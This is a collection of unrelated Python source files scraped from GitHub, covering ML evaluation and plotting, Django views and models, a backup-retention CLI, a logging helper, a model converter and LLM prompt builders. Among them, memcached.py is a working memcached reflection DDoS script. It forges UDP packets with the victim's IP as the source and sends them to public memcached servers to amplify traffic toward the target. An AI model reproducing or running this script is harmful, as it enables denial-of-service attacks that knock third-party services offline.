    if args.resume is not None:
        print(colored("[INFO] Resuming from checkpoint %s..." % args.resume, "green"))
        checkpoint = torch.load(args.resume)
        forwarder.load_state_dict(checkpoint["forwarder"])
        critic.load_state_dict(checkpoint["critic"])
        print(colored("[INFO] Resumed from checkpoint %s." % args.resume, "yellow"))
    else:
        # Evaluation is meaningless without trained weights.
        print(colored("[ERROR] No checkpoint assigned! aborting ...", "red"))
        exit()  # NOTE(review): sys.exit() is preferable outside the REPL
    print(colored("[INFO] Finished initialization.", "yellow"))
    # Inference mode: disables dropout / batch-norm updates.
    forwarder.eval()
    critic.eval()
    ###############################################################################
    # Data preparation
    ###############################################################################
    # Obtain a batch to start
    uniform_batch = pool.get_and_store_uniform_batch(args.batch_size)
    uniform_batch = uniform_batch.to(device)
    uniform_batch = F.one_hot(uniform_batch, num_classes=args.num_alphabet).float()
    previous_batch = uniform_batch
    for it in range(args.timesteps):
        ###############################################################################
        # Feed-forward
        ###############################################################################
        temperature = temperature_schedule(args, it)
        # Obtain forwarder output (probablities)
        generated_batch, _ = forwarder(previous_batch, temperature)
        # Sample a batch of sequences with torch.distribution from forwarder output logits
        sampled_batch_seq = torch.distributions.Categorical(logits=generated_batch).sample()
        # One-hot encode the sampled batch sequence
        sampled_batch = F.one_hot(sampled_batch_seq, num_classes=args.num_alphabet).float()
        sampled_batch_seq = sampled_batch_seq.cpu()
        # Obtain energy from the scoring server
        true_energy = query_score(env, sampled_batch_seq.numpy()).to(device)
        print(
            colored(
                "[EVALUATION] Time: {:3d}, Energy: {:9.6f}"
                .format(it, true_energy.mean()),
                "blue"
            ))
        previous_batch = sampled_batch
    # Visualization thru WGR
    # NOTE(review): indentation reconstructed — assumed the final visualization
    # (getEnergy with the True flag) runs once after the sampling loop; confirm
    # against the original file.
    print(sampled_batch_seq)
    env.getEnergy(sampled_batch_seq.numpy(), True)
    # Press any key to exit
    input("Visualization in progress. \nPress any key to exit...")
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='WGR-DMGIBBS')
    # Scoring-server connection.
    parser.add_argument('--serverIP', type=str, default='127.0.0.1')
    parser.add_argument('--serverPort', type=int, default=4445)
    parser.add_argument('--env', type=str, default='testCity')
    # Sequence / rollout hyper-parameters.
    parser.add_argument('--seq_length', type=int, default=4096)
    parser.add_argument('--timesteps', type=int, default=25)
    parser.add_argument('--delta_time', type=int, default=1)
    parser.add_argument('--num_alphabet', type=int, default=256)
    # Inverse-temperature annealing range (see temperature_schedule).
    parser.add_argument('--invtemp_min', type=float, default=0.0)
    parser.add_argument('--invtemp_max', type=float, default=1.0)
    parser.add_argument('--energy_scale', type=float, default=0.001)
    parser.add_argument('--dont_invert_score', action='store_true')
    parser.add_argument('--batch_size', type=int, default=64)
    parser.add_argument('--modelname', type=str, default='placeholder')
    # Checkpoint to evaluate; main() aborts when this is omitted.
    parser.add_argument('--resume', type=str, default=None)
    args = parser.parse_args()
    # Get a unique name by datetime
    args.savedir = "saved_models/%s/%s[%s]" % (args.env, args.modelname, datetime.now().strftime("%Y%m%d-%H%M%S"))
    args.savepath = os.path.join(args.savedir, "latest.pt")
    main(args)
| betairylia/WorldGen-Voxel-DMGibbs | eval.py | eval.py | py | 5,086 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "wandb.init",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "torch.device",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "torch.cuda.is_available",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"lin... |
71514466985 | import numpy as np
import matplotlib.pyplot as plt
# Accuracy curve: SVM trained on SNN output vs. a fixed MFSC-feature baseline.
# File layout: column 0 = number of training samples, columns 1.. = per-run
# accuracies (assumed from the slicing below — confirm against the producer
# of 'test_accuracies').
x = np.loadtxt('test_accuracies')
plt.figure(figsize=(5.2, 3.1))
# Mean accuracy across runs, with sample standard deviation (ddof=1) as error bars.
plt.errorbar(x[:, 0], x[:, 1:].mean(axis=1), yerr=np.std(x[:, 1:], axis=1, ddof=1), capsize=3, label='SVM accuracy on SNN output')
# Reference accuracy of the SVM on raw MFSC features.
plt.axhline(y=95, color='orange', linestyle='--', label='SVM accuracy on MFSC features')
plt.xlabel('Number of training samples')
plt.ylabel('Accuracy')
plt.legend()
plt.tight_layout()
plt.savefig('accuracy.png')
plt.show()
| colinshane/stdp-conv-speech | figures/accuracy.py | accuracy.py | py | 475 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.loadtxt",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "matplotlib.pypl... |
27691178390 | # Import modules
import random
from scapy.all import IP, UDP, send, Raw
from colorama import Fore
# Load MEMCACHED servers list
with open("tools/L4/memcached_servers.txt", "r") as f:
memcached_servers = f.readlines()
# Payload
payload = "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"
def flood(target):
server = random.choice(memcached_servers)
packets = random.randint(10, 150)
server = server.replace("\n", "")
# Packet
try:
packet = (
IP(dst=server, src=target[0])
/ UDP(sport=target[1], dport=11211)
/ Raw(load=payload)
)
send(packet, count=packets, verbose=False)
except Exception as e:
print(
f"{Fore.MAGENTA}Error while sending forged UDP packet\n{Fore.MAGENTA}{e}{Fore.RESET}"
)
else:
print(
f"{Fore.GREEN}[+] {Fore.YELLOW}Sending {packets} forged UDP packets from memcached server {server} to {'{}:{}'.format(*target)}.{Fore.RESET}"
)
| LimerBoy/Impulse | tools/L4/memcached.py | memcached.py | py | 1,026 | python | en | code | 2,202 | github-code | 36 | [
{
"api_name": "random.choice",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "scapy.all.IP",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "scapy.all.UDP",
"line_n... |
21188323810 | # Мне надоело постоянно менять номер версии в разных файлах, поэтому появился данный скрипт :)
import io
newver = input("Введите номер новой версии: ")


def _bump_version_line(path, prefix, new_line, encoding=None):
    """Rewrite *path* in place, replacing every line that starts with *prefix*
    by *new_line*.

    Prints each replaced line as "old ---> new" for a quick visual diff,
    preserving the behaviour of the three original copy-pasted blocks this
    helper replaces. Context managers guarantee the files are closed even if
    an I/O error occurs mid-rewrite.
    """
    with io.open(path, mode="rt", encoding=encoding) as f:
        lines = f.readlines()
    with io.open(path, mode="wt", encoding=encoding) as f:
        for line in lines:
            if line.startswith(prefix):
                print(line.strip(), "---> ", end="")
                line = new_line
                print(line)
            f.write(line)


# The version number lives in three files with three different line formats.
_bump_version_line("installer.iss", "#define MyAppVersion ",
                   "#define MyAppVersion \"" + newver + "\"\n")
_bump_version_line("main.py", "VER = ",
                   "VER = \"" + newver + "\"\n", encoding="utf-8")
_bump_version_line("README.md", "Текущая версия: ",
                   "Текущая версия: **v" + newver + "** \n", encoding="utf-8")
| student-proger/BellManager | changeVersion.py | changeVersion.py | py | 1,195 | python | ru | code | 0 | github-code | 36 | [
{
"api_name": "io.open",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "io.open",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "io.open",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "io.open",
"line_number": 34,
"usage_t... |
44306025103 | import click
from datetime import timedelta
from pathlib import Path
from typing import Iterable
# this library does not come with type stubs, so we tell mypy to ignore it
import pytimeparse # type: ignore
from urbasys import log_utils
from urbasys.urbackup import retention
BACKUP_ROOT_DIR = "/urbackup/mirror"
@click.group()
@click.option("-v", "--verbose", count=True)
@click.option("-q", "--quiet", count=True)
def main(verbose, quiet):
    # Root CLI group: the repeat counts of -v/-q select the logging
    # verbosity before any subcommand runs.  (Comment, not docstring, so
    # click's generated --help output is unchanged.)
    log_utils.setup_logging(verbose, quiet)
@main.command(name="retain-monthlies", help="Keeps one backup snapshot per month.")
@click.argument(
    "backups-root-dirs",
    nargs=-1,
    type=click.Path(path_type=Path, dir_okay=True, exists=True),
)
@click.option("-n", "--dry-run", is_flag=True)
@click.option(
    "--keep-latest",
    default=30,
    type=int,
    help="The number of latest snapshots to keep. "
    "After that only the oldest snapshot of the month will be kept.",
)
def retain_monthlies(
    backups_root_dirs: Iterable[Path], dry_run: bool, keep_latest: int
) -> None:
    # Apply the monthly retention policy independently to each backup root.
    for root_dir in backups_root_dirs:
        retention.retain_monthlies(root_dir, dry_run, keep_latest)
@main.command(
    name="delete-old",
    help="Deletes backup folders older than a certain amount of time.",
)
@click.argument(
    "backups-root-dirs",
    nargs=-1,
    type=click.Path(path_type=Path, dir_okay=True, exists=True),
)
@click.option("-n", "--dry-run", is_flag=True)
@click.option(
    "--max-age",
    required=True,
    type=lambda arg: timedelta(seconds=pytimeparse.parse(arg)),
    help="Snapshots older than this will be deleted.",
)
@click.option(
    "--min-keep",
    default=5,
    type=int,
    help="The minimum number of snapshots to keep (even if they are older than `--max-age`).",
)
def delete_old(
    backups_root_dirs: Iterable[Path], dry_run: bool, max_age: timedelta, min_keep: int
) -> None:
    # Age-based retention, applied independently to each backup root.
    for root_dir in backups_root_dirs:
        retention.delete_old(root_dir, dry_run, max_age, min_keep)
| urbas/urbasys | urbasys/urbackup/app.py | app.py | py | 2,012 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "urbasys.log_utils.setup_logging",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "urbasys.log_utils",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "click.group",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "click.o... |
34846400693 | from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from django.db.models import CharField, Value, Q
from itertools import chain
from authentication.models import User
from website.models import Review, UserFollows, Ticket
from website import forms
@login_required
def flux(request):
    """Show the feed: tickets and reviews from the user and the users they follow."""
    followed_ids = UserFollows.objects.filter(
        user=request.user
    ).values_list('followed_user', flat=True)

    # Reviews written by followed users, or answering a followed user's ticket.
    reviews = Review.objects.filter(
        Q(user__in=followed_ids) | Q(ticket__user__in=followed_ids)
    ).select_related('user', 'ticket').annotate(
        content_type=Value('REVIEW', CharField())
    )

    # Tickets from the current user and from followed users.
    tickets = Ticket.objects.filter(
        Q(user=request.user) | Q(user__in=followed_ids)
    ).annotate(content_type=Value('TICKET', CharField()))

    # Newest first, reviews and tickets interleaved.
    posts = sorted(
        chain(reviews, tickets),
        key=lambda post: post.time_created,
        reverse=True,
    )

    # Tickets that already received one of the reviews above.
    answered = tickets.filter(review__in=reviews)

    return render(request, 'website/flux.html',
                  context={'posts': posts, 'tickets_already_answer': answered})
@login_required
def create_ticket(request):
    """Display and process the ticket-creation form."""
    form = forms.TicketForm()
    if request.method == "POST":
        form = forms.TicketForm(request.POST, request.FILES)
        if form.is_valid():
            new_ticket = form.save(commit=False)
            new_ticket.user = request.user
            new_ticket.save()
            return redirect('flux')
    # GET, or invalid POST: re-render the (possibly bound) form.
    return render(request, 'website/create_ticket.html',
                  context={"ticket_form": form})
@login_required
def create_review(request):
    """Create a review together with the new ticket it reviews."""
    if request.method == "POST":
        t_form = forms.TicketForm(request.POST, request.FILES)
        r_form = forms.ReviewForm(request.POST)
        if t_form.is_valid() and r_form.is_valid():
            new_ticket = t_form.save(commit=False)
            new_ticket.user = request.user
            new_ticket.save()
            # The review must be linked to the ticket saved just above.
            new_review = r_form.save(commit=False)
            new_review.user = request.user
            new_review.ticket = new_ticket
            new_review.save()
            return redirect('flux')
    else:
        t_form = forms.TicketForm()
        r_form = forms.ReviewForm()
    return render(request, 'website/create_review.html',
                  context={"review_form": r_form, "ticket_form": t_form})
@login_required
def create_review_from_ticket(request, ticket_id):
    """Create a review answering an existing ticket.

    Redirects to the flux when the ticket does not exist.  The original
    wrapped the whole body in a try that also caught UnboundLocalError —
    an exception that could never be raised here — so the try is narrowed
    to the single statement that can actually fail.
    """
    try:
        ticket = Ticket.objects.get(pk=ticket_id)
    except Ticket.DoesNotExist:
        return redirect('flux')
    review_form = forms.ReviewForm()
    if request.method == "POST":
        review_form = forms.ReviewForm(request.POST)
        if review_form.is_valid():
            review = review_form.save(commit=False)
            review.user = request.user
            review.ticket = ticket
            review.save()
            return redirect('flux')
    return render(request, 'website/create_review_from_ticket.html',
                  context={"ticket": ticket, "review_form": review_form})
@login_required
def display_posts(request):
    """List every ticket and review created by the logged-in user, newest first."""
    own_tickets = Ticket.objects.filter(user=request.user).annotate(
        content_type=Value('TICKET', CharField()))
    own_reviews = Review.objects.filter(user=request.user).annotate(
        content_type=Value('REVIEW', CharField()))
    posts = sorted(chain(own_reviews, own_tickets),
                   key=lambda post: post.time_created, reverse=True)
    return render(request, 'website/posts.html', context={"posts": posts})
@login_required
def follow_users(request):
    """Manage subscriptions: list followers, current follows, and users to follow.

    POSTing a ``to_follow`` primary key creates the subscription when the
    target is still followable.
    """
    users_follow_you = [
        uf.user.username
        for uf in UserFollows.objects.filter(followed_user=request.user.id)
    ]
    users_followed = UserFollows.objects.filter(user_id=request.user)
    # Never offer already-followed users or the user themselves.
    users_to_exclude = [uf.followed_user.username for uf in users_followed]
    users_to_exclude.append(request.user.username)
    users_to_follow = User.objects.exclude(username__in=users_to_exclude)
    if request.method == "POST":
        # The original called User.objects.get() unguarded: a stale or
        # forged pk produced a 500 instead of being ignored.
        try:
            to_follow = User.objects.get(pk=request.POST["to_follow"])
        except (User.DoesNotExist, KeyError, ValueError):
            to_follow = None
        if to_follow is not None and to_follow in users_to_follow:
            UserFollows(user=request.user, followed_user=to_follow).save()
        users_followed = UserFollows.objects.filter(user_id=request.user)
    return render(request, 'website/follow_users.html', context={"users_followed": users_followed,
                                                                 "users_to_follow": users_to_follow,
                                                                 "users_follow_you": users_follow_you})
@login_required
def delete_follow_user(request, user_id):
    """Unfollow the user identified by *user_id*, then return to the list."""
    try:
        subscription = UserFollows.objects.get(user=request.user,
                                               followed_user=user_id)
    except UserFollows.DoesNotExist:
        return redirect('follow_users')
    if request.method == "POST":
        subscription.delete()
    # GET (or after deletion): back to the subscriptions page.
    return redirect('follow_users')
@login_required
def delete_review(request, review_id):
    """Delete one of the current user's reviews.

    The original caught ``UserFollows.DoesNotExist`` around a ``Review``
    lookup, so a missing review raised ``Review.DoesNotExist`` (HTTP 500)
    instead of redirecting.
    """
    try:
        review = Review.objects.get(pk=review_id)
    except Review.DoesNotExist:
        return redirect('posts')
    # Only the author may delete their review.
    if review.user != request.user:
        return redirect('posts')
    if request.method == "POST":
        review.delete()
    return redirect('posts')
@login_required
def update_review(request, review_id):
    """Edit one of the current user's reviews.

    The original built ``ReviewForm(request.POST)`` without ``instance=``,
    so saving created a brand-new review instead of updating this one.
    """
    try:
        review = Review.objects.get(pk=review_id)
    except Review.DoesNotExist:
        return redirect('posts')
    # Only the author may edit their review.
    if review.user != request.user:
        return redirect('posts')
    review_form = forms.ReviewForm(instance=review)
    if request.method == "POST":
        # instance=review makes save() update the existing row.
        update_form = forms.ReviewForm(request.POST, instance=review)
        if update_form.is_valid():
            update_form.save()
            return redirect('posts')
    # NOTE(review): an invalid POST re-renders the unbound form (original
    # behavior); showing update_form would surface validation errors.
    context = {"review_form": review_form}
    return render(request, 'website/update_review.html', context=context)
@login_required
def delete_ticket(request, ticket_id):
    """Delete one of the current user's tickets.

    The original caught ``UserFollows.DoesNotExist`` (never raised here)
    and then ``pass``-ed, leaving ``ticket`` unbound and crashing with a
    NameError on the next line when the ticket was missing.
    """
    try:
        ticket = Ticket.objects.get(pk=ticket_id)
    except Ticket.DoesNotExist:
        return redirect('posts')
    # Only the author may delete their ticket.
    if ticket.user != request.user:
        return redirect('posts')
    if request.method == "POST":
        ticket.delete()
    return redirect('posts')
@login_required
def update_ticket(request, ticket_id):
    """Edit one of the current user's tickets.

    The original built ``TicketForm(request.POST, request.FILES)`` without
    ``instance=``, so saving created a brand-new ticket instead of
    updating this one.
    """
    try:
        ticket = Ticket.objects.get(pk=ticket_id)
    except Ticket.DoesNotExist:
        return redirect('posts')
    # Only the author may edit their ticket.
    if ticket.user != request.user:
        return redirect('posts')
    ticket_form = forms.TicketForm(instance=ticket)
    if request.method == "POST":
        # instance=ticket makes save() update the existing row.
        update_form = forms.TicketForm(request.POST, request.FILES,
                                       instance=ticket)
        if update_form.is_valid():
            update_form.save()
            return redirect('posts')
    context = {"ticket_form": ticket_form}
    return render(request, 'website/update_ticket.html', context=context)
| TMee3/DA-PYTHON-9 | website/views.py | views.py | py | 8,215 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "website.models.UserFollows.objects.filter",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "website.models.UserFollows.objects",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "website.models.UserFollows",
"line_number": 19,
"usage_... |
8192772574 | # -*- utf-8 -*-
########################################
# PSF license aggrement for logmsg.py
# Developed by Ivan Rybko
# Logmsg
########################################
from singleton import Singleton
import logging
@Singleton
class Logmsg:
    """Named file logger; each instance appends DEBUG records to '<name>.log'."""

    def __init__(self, name):
        # lname: logger name; lpath: log file next to the working directory.
        if isinstance(name, str):
            self.lname = name
            self.lpath = self.lname + ".log"

    def logmsg(self, message):
        """Write *message* to this logger's file and mirror it to the root logger."""
        logger = logging.getLogger(self.lname)
        logger.setLevel(logging.DEBUG)
        # Attach the file handler only once: the original created a new
        # FileHandler on every call, duplicating every log line and leaking
        # one file descriptor per message.
        if not logger.handlers:
            loghandler = logging.FileHandler(self.lpath)
            loghandler.setLevel(logging.DEBUG)
            frmt = logging.Formatter('{asctime} {name} {levelname:8s} {message}', style='{')
            loghandler.setFormatter(frmt)
            logger.addHandler(loghandler)
        logger.debug(message)
        # Mirror to the root logger, as before.
        logging.info(message)

    def __call__(self, message):
        """Allow instances to be used as callables: log(message)."""
        self.logmsg(message)
def uselog(*args):
    """Convenience wrapper: uselog(name, message) logs *message* via Logmsg(name)."""
    name, message = args[0], args[1]
    Logmsg(name)(message)
# Registry of pre-built loggers, keyed by subsystem name; each value logs
# to "<name>.log" via Logmsg above.
logs = {
    "static": Logmsg("staticserver"),
    "dynamic": Logmsg("dynamicserver"),
    "httpserver": Logmsg("httpserver"),
    "smtpserver": Logmsg("smtpserver"),
    "wsgiserver": Logmsg("wsgiserver"),
    "wsgiapp": Logmsg("wsgiapp"),
    "imapclient": Logmsg("imapclient"),
    "smtpclient": Logmsg("smtpclient"),
    "httpclient": Logmsg("httpclient"),
    "dbrequest": Logmsg("dbrequest")
}
| irybko/pyclasses | logmsg.py | logmsg.py | py | 1,573 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "logging.FileHandler",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "logging.DEBU... |
70816879145 | #!/usr/bin/env python
'''
./converter.py \
--model model.h5 \
--desc "Predicts either a phone is in the hands or in a pocket" \
--input_desc "Sensor samples (acc, gyro, mag, 50Hz)" \
--output_desc "1 - phone in the hands, 0 - phone in a pocket" \
--author "Danylo Kostyshyn" \
--license="MIT"
'''
from __future__ import absolute_import
import os
import argparse
import coremltools
import numpy as np
from keras.models import load_model
# CLI definition; the parsed `args` namespace is read by main() below.
parser = argparse.ArgumentParser(description='Converts Keras .h5 model to CoreML .mlmodel')
parser.add_argument('--model', dest='model_name', help='Input model name')
parser.add_argument('--desc', dest='desc', help='Short description')
parser.add_argument('--input_desc', dest='input_desc', help='Input description')
# NOTE(review): "Oouput" typo in the help string below is user-visible text,
# left untouched here.
parser.add_argument('--output_desc', dest='output_desc', help='Oouput description')
parser.add_argument('--author', dest='author', help='Author')
parser.add_argument('--license', dest='license', help='License')

args = parser.parse_args()
def main():
    """Convert the Keras .h5 model named by --model to a CoreML .mlmodel.

    The output file is written next to the input, with the extension
    replaced by ``.mlmodel``.
    """
    model_name = args.model_name
    keras_model = load_model(model_name)
    coreml_model = coremltools.converters.keras.convert(
        keras_model, input_names='input', output_names='output')
    coreml_model.input_description['input'] = args.input_desc
    coreml_model.output_description['output'] = args.output_desc
    coreml_model.short_description = args.desc
    coreml_model.author = args.author
    coreml_model.license = args.license
    # os.path.join() with a single argument is a no-op, so build the output
    # path directly from the stem of the input file name.
    f_name, _f_ext = os.path.splitext(model_name)
    coreml_model.save(f_name + '.mlmodel')
    print("Success!")

if __name__ == '__main__':
    main()
{
"api_name": "argparse.ArgumentParser",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "keras.models.load_model",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "coremltools.converters.keras.convert",
"line_number": 34,
"usage_type": "call"
},
{
... |
70939042984 | import os
import numpy as np
import matplotlib.pyplot as plt
from config import *
from model import get_model
from data import get_single_test
def evaluate(test_num):
    """Score one test sequence with the autoencoder and plot its regularity curve."""
    model = get_model(train=TRAIN_MODEL)
    print("got model")
    test = get_single_test(test_num)
    print("got test")

    window_count = test.shape[0] - CLIP_LEN
    clips = np.zeros((window_count, *DIM, N_CHANNELS))
    # Sliding window: clip i covers frames [i, i + CLIP_LEN).
    for start in range(window_count):
        clips[start] = test[start:start + CLIP_LEN, :, :, :]

    # Reconstruction error of every clip.
    reconstructions = model.predict(clips, batch_size=BATCH_SIZE)
    cost = np.array([np.linalg.norm(clips[i] - reconstructions[i])
                     for i in range(window_count)])

    # Abnormality score, then the regularity score plotted below.
    sa = (cost - np.min(cost)) / np.max(cost)
    sr = 1.0 - sa

    plt.plot(sr)
    plt.ylabel('regularity score Sr(t)')
    plt.xlabel('frame t')
    if not os.path.exists(FIG_PATH):
        os.makedirs(FIG_PATH)
    plt.savefig(f'{FIG_PATH}/Figure_{(test_num or TEST_NUM):03d}.png')
    # plt.show()
    plt.clf()
if __name__=="__main__":
    # Batch-evaluate test sequences 4 through 15.
    for i in range(4, 16):
        evaluate(i)
| Colprit/VideoAnomolyDetection | main.py | main.py | py | 1,321 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "model.get_model",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "data.get_single_test",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"l... |
18394788465 | from typing import List, Union
from openai.types.chat import ChatCompletionMessageParam, ChatCompletionContentPartParam
from imported_code_prompts import (
IMPORTED_CODE_BOOTSTRAP_SYSTEM_PROMPT,
IMPORTED_CODE_IONIC_TAILWIND_SYSTEM_PROMPT,
IMPORTED_CODE_REACT_TAILWIND_SYSTEM_PROMPT,
IMPORTED_CODE_TAILWIND_SYSTEM_PROMPT,
IMPORTED_CODE_SVG_SYSTEM_PROMPT,
)
from screenshot_system_prompts import (
BOOTSTRAP_SYSTEM_PROMPT,
IONIC_TAILWIND_SYSTEM_PROMPT,
REACT_TAILWIND_SYSTEM_PROMPT,
TAILWIND_SYSTEM_PROMPT,
SVG_SYSTEM_PROMPT,
)
# Instruction appended to each screenshot-based generation request.
USER_PROMPT = """
Generate code for a web page that looks exactly like this.
"""

# Variant used when the requested output stack is SVG.
SVG_USER_PROMPT = """
Generate code for a SVG that looks exactly like this.
"""
def assemble_imported_code_prompt(
    code: str, stack: str, result_image_data_url: Union[str, None] = None
) -> List[ChatCompletionMessageParam]:
    """Build the system/user chat messages for regenerating imported code.

    Raises when *stack* is not one of the supported output stacks.
    """
    system_prompts = {
        "html_tailwind": IMPORTED_CODE_TAILWIND_SYSTEM_PROMPT,
        "react_tailwind": IMPORTED_CODE_REACT_TAILWIND_SYSTEM_PROMPT,
        "bootstrap": IMPORTED_CODE_BOOTSTRAP_SYSTEM_PROMPT,
        "ionic_tailwind": IMPORTED_CODE_IONIC_TAILWIND_SYSTEM_PROMPT,
        "svg": IMPORTED_CODE_SVG_SYSTEM_PROMPT,
    }
    if stack not in system_prompts:
        raise Exception("Code config is not one of available options")
    system_content = system_prompts[stack]

    if stack == "svg":
        user_content = "Here is the code of the SVG: " + code
    else:
        user_content = "Here is the code of the app: " + code

    return [
        {
            "role": "system",
            "content": system_content,
        },
        {
            "role": "user",
            "content": user_content,
        },
    ]
# TODO: Use result_image_data_url
def assemble_prompt(
    image_data_url: str,
    generated_code_config: str,
    result_image_data_url: Union[str, None] = None,
) -> List[ChatCompletionMessageParam]:
    """Build the chat messages for screenshot-to-code generation.

    When *result_image_data_url* is given, the previous render is inserted
    between the target screenshot and the text prompt.
    """
    system_prompts = {
        "html_tailwind": TAILWIND_SYSTEM_PROMPT,
        "react_tailwind": REACT_TAILWIND_SYSTEM_PROMPT,
        "bootstrap": BOOTSTRAP_SYSTEM_PROMPT,
        "ionic_tailwind": IONIC_TAILWIND_SYSTEM_PROMPT,
        "svg": SVG_SYSTEM_PROMPT,
    }
    if generated_code_config not in system_prompts:
        raise Exception("Code config is not one of available options")
    system_content = system_prompts[generated_code_config]

    user_prompt = SVG_USER_PROMPT if generated_code_config == "svg" else USER_PROMPT
    user_content: List[ChatCompletionContentPartParam] = [
        {
            "type": "image_url",
            "image_url": {"url": image_data_url, "detail": "high"},
        },
        {
            "type": "text",
            "text": user_prompt,
        },
    ]
    if result_image_data_url:
        user_content.insert(
            1,
            {
                "type": "image_url",
                "image_url": {"url": result_image_data_url, "detail": "high"},
            },
        )
    return [
        {
            "role": "system",
            "content": system_content,
        },
        {
            "role": "user",
            "content": user_content,
        },
    ]
| abi/screenshot-to-code | backend/prompts.py | prompts.py | py | 3,553 | python | en | code | 15,739 | github-code | 36 | [
{
"api_name": "typing.Union",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "imported_code_prompts.IMPORTED_CODE_TAILWIND_SYSTEM_PROMPT",
"line_number": 33,
"usage_type": "name"
},
{
"api_name": "imported_code_prompts.IMPORTED_CODE_TAILWIND_SYSTEM_PROMPT",
"line_nu... |
74747977385 | #MORFOLOJİK OPERASYONLAR
# Morphological operations demo (erosion, dilation, opening, closing, gradient).
import cv2
import matplotlib.pyplot as plt
import numpy as np

img = cv2.imread("img.png", 0)
plt.figure(), plt.imshow(img, cmap="gray"), plt.axis("off")

# EROSION - erodes the boundaries of the foreground object.
kernel = np.ones((3, 3), dtype=np.uint8)
result = cv2.erode(img, kernel, iterations=1)
plt.figure(), plt.imshow(result, cmap="gray"), plt.axis("off")

# DILATION - expands the boundaries of the foreground object (inverse of erosion).
result2 = cv2.dilate(img, kernel, iterations=1)
plt.figure(), plt.imshow(result2, cmap="gray"), plt.axis("off")

# OPENING (erosion + dilation) - useful for removing white noise.
whiteNoise = np.random.randint(0, 2, size=img.shape[:2])
whiteNoise = whiteNoise * 255
plt.figure(), plt.imshow(whiteNoise, cmap="gray"), plt.axis("off")

noise_img = whiteNoise + img
plt.figure(), plt.imshow(noise_img, cmap="gray"), plt.axis("off")

opening = cv2.morphologyEx(noise_img.astype(np.float32), cv2.MORPH_OPEN, kernel)
plt.figure(), plt.imshow(opening, cmap="gray"), plt.axis("off"), plt.title("Açilma")

# CLOSING (dilation + erosion) - useful for closing small holes or black dots
# on the foreground object.
blackNoise = np.random.randint(0, 2, size=img.shape[:2])
# BUG FIX: the original line was `blackNoise = whiteNoise * -255`, which
# discarded the freshly generated black-noise mask above.
blackNoise = blackNoise * -255
black_noise_img = img + blackNoise
black_noise_img[black_noise_img <= -245] = 0
plt.figure(), plt.imshow(black_noise_img, cmap="gray"), plt.axis("off"), plt.title("black noise")

closing = cv2.morphologyEx(black_noise_img.astype(np.float32), cv2.MORPH_CLOSE, kernel)
plt.figure(), plt.imshow(closing, cmap="gray"), plt.axis("off"), plt.title("Kapanma")

# MORPHOLOGICAL GRADIENT = dilation - erosion (outlines the object).
gradient = cv2.morphologyEx(img, cv2.MORPH_GRADIENT, kernel)
plt.figure(), plt.imshow(gradient, cmap="gray"), plt.axis("off"), plt.title("GRADIENT")

plt.show()
| tetroweb/opencv_lessons | lessons/chapter_9.py | chapter_9.py | py | 1,993 | python | tr | code | 0 | github-code | 36 | [
{
"api_name": "cv2.imread",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.... |
75111308265 | from django.db import models
from mptt.models import MPTTModel, TreeForeignKey
from accounts.models import User
class Category(MPTTModel):
    """Hierarchical menu category (django-mptt tree node)."""

    name = models.CharField(max_length=100, verbose_name='Имя категории')
    slug = models.SlugField(max_length=100, verbose_name='Ссылка')
    # Optional parent node; children are reachable via `category.children`.
    parent = TreeForeignKey('self',
                            verbose_name='Родитель',
                            related_name='children',
                            on_delete=models.SET_NULL,
                            blank=True,
                            null=True
                            )

    class MPTTMeta:
        level_attr = 'mptt_level'
        order_insertion_by = ['name']

    class Meta:
        verbose_name = 'Категория'
        verbose_name_plural = 'Категории'

    def __str__(self):
        return self.name
class Ingredients(models.Model):
    """A single ingredient, addressable by slug."""

    name = models.CharField(max_length=100, verbose_name='Ингредиент')
    slug = models.SlugField(max_length=100, verbose_name='Ссылка')

    class Meta:
        verbose_name = 'Ингредиент'
        verbose_name_plural = 'Ингредиенты'

    def __str__(self) -> str:
        return self.name
class Dish(models.Model):
    """A dish linked to a single ingredient record."""

    name = models.CharField(max_length=50, verbose_name='Название блюда')
    slug = models.SlugField(max_length=50)
    ingredients = models.ForeignKey(Ingredients,
                                    related_name='ingredients',
                                    verbose_name='Ингредиенты',
                                    on_delete=models.CASCADE)

    class Meta:
        verbose_name = 'Блюда'
        verbose_name_plural = 'Блюда'

    def __str__(self) -> str:
        return self.name
class DeyWeek(models.Model):
    """Day of the week.

